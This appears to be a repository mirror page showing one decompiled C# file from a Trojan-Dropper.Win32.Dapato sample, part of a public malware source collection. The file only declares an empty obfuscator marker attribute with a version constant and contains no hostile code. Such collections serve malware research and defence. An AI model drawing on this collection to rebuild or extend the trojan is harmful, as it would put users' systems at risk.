mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
f2ac1ece55
add
13 lines
476 B
C#
13 lines
476 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: BabelAttribute
|
|
// Assembly: App, Version=6.11.5.1, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 843578DF-6576-45E1-B6A2-485233E8A253
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86.exe
|
|
|
|
using System;
|
|
|
|
public sealed class BabelAttribute : Attribute
|
|
{
|
|
public const string Version = "5.0.0.0";
|
|
}
|